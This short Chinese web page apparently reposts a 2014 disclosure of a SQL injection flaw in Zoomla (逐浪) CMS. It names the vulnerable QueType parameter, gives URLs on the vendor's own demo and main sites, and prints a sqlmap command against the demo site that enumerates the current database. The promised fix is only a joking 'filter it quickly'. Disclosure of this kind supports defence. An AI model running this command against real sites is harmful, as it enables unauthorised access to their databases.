逐浪cms通用型Sql注入漏洞及漏洞修复方案2014下载

逐浪cms通用型Sql注入漏洞及漏洞修复方案2014

Url:http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?QueType=

http://www.zoomla.cn/guest/Ask/MyAskList.aspx?QueType=

参数QueType

权限太大啊,妥妥低。

sqlmap.py -u "http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?

QueType=1" -v 1 --current-db

修复方案:

赶快过滤吧,黑客大牛们手下留情,哈哈

上一篇: 课程格子APP设计缺陷导致任意用户信息泄露漏洞及修补方法下载
下一篇: [公开漏洞]中国铁道科学研究院某系统命令执行(可内网)
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细